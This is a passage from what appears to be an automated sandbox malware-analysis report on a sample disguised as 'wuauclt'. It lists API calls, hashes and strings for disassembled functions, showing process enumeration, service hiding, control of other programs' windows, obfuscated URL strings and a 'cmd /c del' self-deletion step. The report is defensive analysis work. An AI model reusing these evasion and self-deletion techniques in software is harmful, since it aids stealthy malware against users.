                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
                                                                            • Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            Function 004084B8 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1839875000-0
                                                                            • Opcode ID: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction ID: 531a484f82c7889d25c20d7142e9803b131f223dc912937a257ed96ba5c7c79c
                                                                            • Opcode Fuzzy Hash: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction Fuzzy Hash:

                                                                            Non-executed Functions

                                                                            Function 00404540 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction ID: 023e8f8eb36bf4682933e0370cb39b54a2ce952b5e9d5c020180350aed9ba6c9
                                                                            • Opcode Fuzzy Hash: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction Fuzzy Hash: 6231C9F06403509FDB11EBB5AA85A2933E8EB96305750657ABA00EF6D4D77CC810CB1E
                                                                            Function 00406C30 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 207windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • FindWindowA.USER32(#32770,00000000), ref: 00406CE5
                                                                            • GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
                                                                            • FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
                                                                            • FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
                                                                            • FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
                                                                            • SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
                                                                            • Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
                                                                            • SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessageSend$DirectorySleepTextWindows
                                                                            • String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
                                                                            • API String ID: 4044579835-3821104793
                                                                            • Opcode ID: 7bc828927aa5adc98a8c4b3d3eb846265135c5d493d9185cc1e0f1433f4ac3de
                                                                            • Instruction ID: c2cdf916bea0aacb3b287b9c217ab58656c52756c70eb46c7f93f36c1c6821be
                                                                            • Opcode Fuzzy Hash: 7bc828927aa5adc98a8c4b3d3eb846265135c5d493d9185cc1e0f1433f4ac3de
                                                                            • Instruction Fuzzy Hash: 53813670340206AFE710EF64D986F5A77A9EB85704F51407AF901BB2E2D7B8AD50CB9C
                                                                            Function 004025DC Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: "$"
                                                                            • API String ID: 3213498283-3758156766
                                                                            • Opcode ID: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction ID: 378b31890ac25dcdd700d67078953c889e09c483e5a359b479ed21abc8ee7f2f
                                                                            • Opcode Fuzzy Hash: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction Fuzzy Hash: 1921E8606043912ADF3129754EC836B6B894A1B704B680DBB95C1BB3C7D4FE488B976E
                                                                            Function 0040187C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
                                                                            • LocalFree.KERNEL32(006832B8,00000000,00401952), ref: 004018BB
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006832B8,00000000,00401952), ref: 004018DA
                                                                            • LocalFree.KERNEL32(006842B8,?,00000000,00008000,006832B8,00000000,00401952), ref: 00401919
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
                                                                            • RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID: Hh
                                                                            • API String ID: 3782394904-2683877627
                                                                            • Opcode ID: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction ID: 59a79e90b1042c7fa72c1bdd4368158aee1beb707aa836db6f4ae4b0191b2b59
                                                                            • Opcode Fuzzy Hash: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
                                                                            • Instruction Fuzzy Hash: 171160B1604340AEE715AB659D92F1337A8B74A708F14843BF200BA6F2D67D98A0D71E
                                                                            Function 00403854 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
                                                                            • GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922), ref: 004038A8
                                                                            • WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922), ref: 004038AE
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004038CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
                                                                            • Instruction ID: 73fe0ec3fb90fb3f474716323d8876418e50ff0bdbf46fc0c8a6d106d48d8078
                                                                            • Opcode Fuzzy Hash: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
                                                                            • Instruction Fuzzy Hash: 89F09662A8434478E73077615D06F56369C5744F16F20C6BFB260745F2C6BC89C4831E
                                                                            Function 004053F6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: c2eb696905c10da3cfedb0ffb1c73e7a88a6af273a9ce6182ee53f48f0eb6ae6
                                                                            • Instruction ID: 9fb5fde48b0b51318b29d690c95603ab6f24dde2ee0048554a78b08ccb085c6b
                                                                            • Opcode Fuzzy Hash: c2eb696905c10da3cfedb0ffb1c73e7a88a6af273a9ce6182ee53f48f0eb6ae6
                                                                            • Instruction Fuzzy Hash: B3214FB0A4061C6ADB20EF64CC89BDAB7B9EB48304F5045F7B508F6181D6B85E808E98
                                                                            Function 004053F8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: 04c82b09afb268f21461838a035d4bfd2e0eff3feaf026e00bce95848d474ef0
                                                                            • Instruction ID: 0425c3d2602aa380be99970c4860828b2cef43e56b29c4e0dd38b7bacb301f0e
                                                                            • Opcode Fuzzy Hash: 04c82b09afb268f21461838a035d4bfd2e0eff3feaf026e00bce95848d474ef0
                                                                            • Instruction Fuzzy Hash: BF2150B094061C6ADB20EF64CC89BDBB7B9EB48304F5045F7A508B7181D7B85F808E98
                                                                            Function 004049CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
                                                                            • FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProcVersion
                                                                            • String ID: RegisterServiceProcess$kernel32.dll
                                                                            • API String ID: 493525861-4020013434
                                                                            • Opcode ID: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction ID: 584902bb4f43a048dfb4edc9276af123f762f69e99b58a94aa2e669f31c097c7
                                                                            • Opcode Fuzzy Hash: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction Fuzzy Hash: F6F012F17C13009BD611EB759E0AB1932A4E7E4706F40447BB784B72D1E77D8456CA1E
                                                                            Function 00403174 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
                                                                            • RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction ID: 5b13f427154e47eb786ec22587604168a85df8ea8a10eb055b4820c5abfa16c8
                                                                            • Opcode Fuzzy Hash: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction Fuzzy Hash: 7A019275500308BADB11DF909C42FAA7BBCE709701F6005B6B910F65D1E6799B50D75C
                                                                            Function 004050D8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction ID: 6f675109087fc91689d1b7d6d1dc425710a191357d6ada5f1f571d808edafb71
                                                                            • Opcode Fuzzy Hash: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction Fuzzy Hash: 74118270E006185FDB25EB61CC02BDABBB9EB49700F5145FBA648F61C1D6F84A808E65
                                                                            Function 004050DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction ID: 5e39bd01bb10aff84b20b8e8c33debca7a73d60c2ec277af15caf5139dfd1cd6
                                                                            • Opcode Fuzzy Hash: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction Fuzzy Hash: 5E116170E0061C5FDB25EB61CC02BDABBB9EB48700F5145F6A608F61C1E6F85A808E69
                                                                            Function 00401334 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
